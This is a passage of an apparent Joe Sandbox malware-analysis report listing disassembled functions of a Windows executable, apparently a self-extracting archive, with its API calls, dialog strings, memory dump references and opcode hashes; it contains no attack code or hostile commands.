                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemText$DialogWindow
                                                                                                                        • String ID: ASKNEXTVOL
                                                                                                                        • API String ID: 445417207-3402441367
                                                                                                                        • Opcode ID: 0e33d8df403addcfc7f7d313c6aa5b80d7968b5e405a4fd7a3504c06418bae72
                                                                                                                        • Instruction ID: 18ea1085d5d19d65124229d4a304c68d5db69679b6bfa19e1feaf15a29f0a3e7
                                                                                                                        • Opcode Fuzzy Hash: 0e33d8df403addcfc7f7d313c6aa5b80d7968b5e405a4fd7a3504c06418bae72
                                                                                                                        • Instruction Fuzzy Hash: 2F11B432240300AFD711DF6ADC05FB67BA9AB8F74AF141465F280FF4A0C761A909D722
                                                                                                                        Function 00EADDA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DialogBoxParamW.USER32(GETPASSWORD1,0001043A,00EAB270,?,?), ref: 00EADE18
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DialogParam
                                                                                                                        • String ID: GETPASSWORD1$r$xz
                                                                                                                        • API String ID: 665744214-1165776382
                                                                                                                        • Opcode ID: e580985a67e221830d0e251a30c16baeba155c96d59e4e2a3ae8994ef1380959
                                                                                                                        • Instruction ID: 19213694a87f98c73f72cc33f7645c069db3ba615c7e61988b4182f45e9257df
                                                                                                                        • Opcode Fuzzy Hash: e580985a67e221830d0e251a30c16baeba155c96d59e4e2a3ae8994ef1380959
                                                                                                                        • Instruction Fuzzy Hash: B311E932604244AADF129A35AC02FEB3798E74A754F145066F946FF1C1CAB4BC84C764
                                                                                                                        Function 00E9D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __fprintf_l.LIBCMT ref: 00E9D954
                                                                                                                        • _strncpy.LIBCMT ref: 00E9D99A
                                                                                                                          • Part of subcall function 00EA1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00ED1030,00000200,00E9D928,00000000,?,00000050,00ED1030), ref: 00EA1DC4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                                        • String ID: $%s$@%s
                                                                                                                        • API String ID: 562999700-834177443
                                                                                                                        • Opcode ID: 566f155ad73efa65a48be48eea1a6b3931e59a8c2603c5ad94430f0179a1bddc
                                                                                                                        • Instruction ID: 3b85875420d4029f5e95e3e4f0e0336a5a933f3fce974ad2b3083ba9eddf398c
                                                                                                                        • Opcode Fuzzy Hash: 566f155ad73efa65a48be48eea1a6b3931e59a8c2603c5ad94430f0179a1bddc
                                                                                                                        • Instruction Fuzzy Hash: 0621A232444358AEDF21EEA4CD05FDE7BE8AF45304F045016FA10B62A2E2B2D659CB51
                                                                                                                        Function 00EA0E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00E9AC5A,00000008,?,00000000,?,00E9D22D,?,00000000), ref: 00EA0E85
                                                                                                                        • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00E9AC5A,00000008,?,00000000,?,00E9D22D,?,00000000), ref: 00EA0E8F
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00E9AC5A,00000008,?,00000000,?,00E9D22D,?,00000000), ref: 00EA0E9F
                                                                                                                        Strings
                                                                                                                        • Thread pool initialization failed., xrefs: 00EA0EB7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                        • String ID: Thread pool initialization failed.
                                                                                                                        • API String ID: 3340455307-2182114853
                                                                                                                        • Opcode ID: dc6ae8e593ab5223b5fafa85bd6a41739a6d97907444f1eb8459942f37a54b16
                                                                                                                        • Instruction ID: a326592c73d8c3acc00c40458d0da50453548cd1271e0953725e75d9d8664fe3
                                                                                                                        • Opcode Fuzzy Hash: dc6ae8e593ab5223b5fafa85bd6a41739a6d97907444f1eb8459942f37a54b16
                                                                                                                        • Instruction Fuzzy Hash: 4211A3B26007089FC7215F7A9C859A7FBECEB69744F109C2FF1DAD6200D67169419B50
                                                                                                                        Function 00E9124F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Malloc
                                                                                                                        • String ID: ($2$A
                                                                                                                        • API String ID: 2696272793-112831991
                                                                                                                        • Opcode ID: 603e827f522b91f4230f367176e75bd526ab8adf9a46d555f5e01e2a9187dce0
                                                                                                                        • Instruction ID: cb8c29a6992b191dddab34c21a75a5333c727086af2e44764c521d40d0aeafb6
                                                                                                                        • Opcode Fuzzy Hash: 603e827f522b91f4230f367176e75bd526ab8adf9a46d555f5e01e2a9187dce0
                                                                                                                        • Instruction Fuzzy Hash: 98011B71901219AFCF14DFA5D8449EEBBF8EF09304B1041AAE905F3250D7749A44DF94
                                                                                                                        Function 00EADCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                        • API String ID: 0-56093855
                                                                                                                        • Opcode ID: 778b43a4fa349dd05c576113075df0006f24b4c91a8bfcf313b5a8425feadb27
                                                                                                                        • Instruction ID: 3510c40da94f1712e42746cf4f172ba328070680774e7a579ee3463004e7d924
                                                                                                                        • Opcode Fuzzy Hash: 778b43a4fa349dd05c576113075df0006f24b4c91a8bfcf313b5a8425feadb27
                                                                                                                        • Instruction Fuzzy Hash: 9801F576608289AFCB104F66FD44A967FA4F74E344B10102BF402FB630C631A854DBA0
                                                                                                                        Function 00E91316 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E9E2E8: _swprintf.LIBCMT ref: 00E9E30E
                                                                                                                          • Part of subcall function 00E9E2E8: _strlen.LIBCMT ref: 00E9E32F
                                                                                                                          • Part of subcall function 00E9E2E8: SetDlgItemTextW.USER32(?,00ECE274,?), ref: 00E9E38F
                                                                                                                          • Part of subcall function 00E9E2E8: GetWindowRect.USER32(?,?), ref: 00E9E3C9
                                                                                                                          • Part of subcall function 00E9E2E8: GetClientRect.USER32(?,?), ref: 00E9E3D5
                                                                                                                        • GetDlgItem.USER32(00000000,00003021), ref: 00E9135A
                                                                                                                        • SetWindowTextW.USER32(00000000,00EC35F4), ref: 00E91370
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                                        • String ID: $0
                                                                                                                        • API String ID: 2622349952-2895914132
                                                                                                                        • Opcode ID: 709566cdaaaeec0333bdb37d36c1b2787549ef543388aede7ad6ded6bcd227a6
                                                                                                                        • Instruction ID: ab1aac411f092f8f2e2aa911a2c5973a39e78c726b149bdb8f6a41db25a319c2
                                                                                                                        • Opcode Fuzzy Hash: 709566cdaaaeec0333bdb37d36c1b2787549ef543388aede7ad6ded6bcd227a6
                                                                                                                        • Instruction Fuzzy Hash: 34F04430104389BADF159F618C0EBFD3BB9AF44348F05A2D4FD44759A1CB75C995DA50
                                                                                                                        Function 00EB9A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1036877536-0
                                                                                                                        • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                                        • Instruction ID: 0e4b05bdddc38dba9d40e5462f51970e2e2581787224bcced00bc7971f808dad
                                                                                                                        • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                                        • Instruction Fuzzy Hash: EFA14472A002869FEB158F28C8917EBFFE4EF51304F18516DE685BB283C2388941CB50
                                                                                                                        Function 00E9A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00E97F69,?,?,?), ref: 00E9A3FA
                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00E97F69,?), ref: 00E9A43E
                                                                                                                        • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00E97F69,?,?,?,?,?,?,?), ref: 00E9A4BF
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00000800,?,00E97F69,?,?,?,?,?,?,?,?,?,?), ref: 00E9A4C6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Create$CloseHandleTime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2287278272-0
                                                                                                                        • Opcode ID: 8aade6248c81400b056001c9745f552c383395bb4355988ff6a604e51bf16af2
                                                                                                                        • Instruction ID: 8a1bce576250964b0a214ac205cb483d5bcbda3b02c208bdd63f3a2417a9ef61
                                                                                                                        • Opcode Fuzzy Hash: 8aade6248c81400b056001c9745f552c383395bb4355988ff6a604e51bf16af2
                                                                                                                        • Instruction Fuzzy Hash: 1841E1312483819ADB31DF24DC46FEEBBE4AF85304F18092DB5E1A7180D6A49A4CDB93
                                                                                                                        Function 00EBC988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00EB91E0,?,00000000,?,00000001,?,?,00000001,00EB91E0,?), ref: 00EBC9D5
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00EBCA5E
                                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00EB6CBE,?), ref: 00EBCA70
                                                                                                                        • __freea.LIBCMT ref: 00EBCA79
                                                                                                                          • Part of subcall function 00EB8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00EBCA2C,00000000,?,00EB6CBE,?,00000008,?,00EB91E0,?,?,?), ref: 00EB8E38
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2652629310-0
                                                                                                                        • Opcode ID: 81d3f5b0160f74fb4c3775fa5ae0aca62c95f367f894dd241b66bcc95228747b
                                                                                                                        • Instruction ID: b76110d0717a13dfe47a293e86c1f0f72bc2ab02fbc31d4bed580f1713101d16
                                                                                                                        • Opcode Fuzzy Hash: 81d3f5b0160f74fb4c3775fa5ae0aca62c95f367f894dd241b66bcc95228747b
                                                                                                                        • Instruction Fuzzy Hash: 5D31AC72A0020AAFDB25CF64CC41DEF7BA5EB41310B144129F805F6250EB35DD91CBA0
                                                                                                                        Function 00EAA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 00EAA666
                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00EAA675
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EAA683
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00EAA691
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDevice$Release
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1035833867-0
                                                                                                                        • Opcode ID: 96ae9bf437ea276224adf09d9029b49343e8f9fbdf4e112ee806cb0df14b085a
                                                                                                                        • Instruction ID: 13ae3fa359407f476793fa484bf972dce5ece7a85df6f5efa6950409bb0f8fd9
                                                                                                                        • Opcode Fuzzy Hash: 96ae9bf437ea276224adf09d9029b49343e8f9fbdf4e112ee806cb0df14b085a
                                                                                                                        • Instruction Fuzzy Hash: 65E0EC31982721BFD2615B72BD0DB9B3F54EB55B52F054113FA05BA190DF648A08CBA1
                                                                                                                        Function 00EAD06A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 278COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr
                                                                                                                        • String ID: .lnk$d
                                                                                                                        • API String ID: 2691759472-761835416
                                                                                                                        • Opcode ID: c0a901b88e882284aec08a4e6bf6fc6b449484ae99492ccf591984d7c25844bb
                                                                                                                        • Instruction ID: 2280899fce85c582e34e055ad9256efda774226623317130a6c9bd0660a822db
                                                                                                                        • Opcode Fuzzy Hash: c0a901b88e882284aec08a4e6bf6fc6b449484ae99492ccf591984d7c25844bb
                                                                                                                        • Instruction Fuzzy Hash: 4DA196728041299ADF24DBA0DD45EFA73FC9F49304F0895A6F50AFB551EE34AB84CB60
                                                                                                                        Function 00E975DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00E975E3
                                                                                                                          • Part of subcall function 00EA05DA: _wcslen.LIBCMT ref: 00EA05E0
                                                                                                                          • Part of subcall function 00E9A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00E9A598
                                                                                                                        • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E9777F
                                                                                                                          • Part of subcall function 00E9A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00E9A325,?,?,?,00E9A175,?,00000001,00000000,?,?), ref: 00E9A501
                                                                                                                          • Part of subcall function 00E9A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00E9A325,?,?,?,00E9A175,?,00000001,00000000,?,?), ref: 00E9A532
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                                                        • String ID: :
                                                                                                                        • API String ID: 3226429890-336475711
                                                                                                                        • Opcode ID: a45f6d52f29fbcb9f9c3dfe3e40f9dfe5de658b598df4c5f341398374c2da4bf
                                                                                                                        • Instruction ID: ab25a83b437c55517fe02c10e8a83b446115740e56136465f925bb949f1ac9ad
                                                                                                                        • Opcode Fuzzy Hash: a45f6d52f29fbcb9f9c3dfe3e40f9dfe5de658b598df4c5f341398374c2da4bf
                                                                                                                        • Instruction Fuzzy Hash: D9416071901258A9EF25EB64CC59EEEB3B8EF45300F0050EAB645B6093DB745F89CB71
                                                                                                                        Function 00E9B37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr
                                                                                                                        • String ID: *
                                                                                                                        • API String ID: 2691759472-163128923
                                                                                                                        • Opcode ID: d6697c86140e4dac39f2411a3a4d337c5caf6ff40559d8d960ddcdc8cb57313e
                                                                                                                        • Instruction ID: c5fda44dc4a01c9f4bfcb7df254f48f73d8a4bf0a0a338b38319de8cd7e1e20f
                                                                                                                        • Opcode Fuzzy Hash: d6697c86140e4dac39f2411a3a4d337c5caf6ff40559d8d960ddcdc8cb57313e
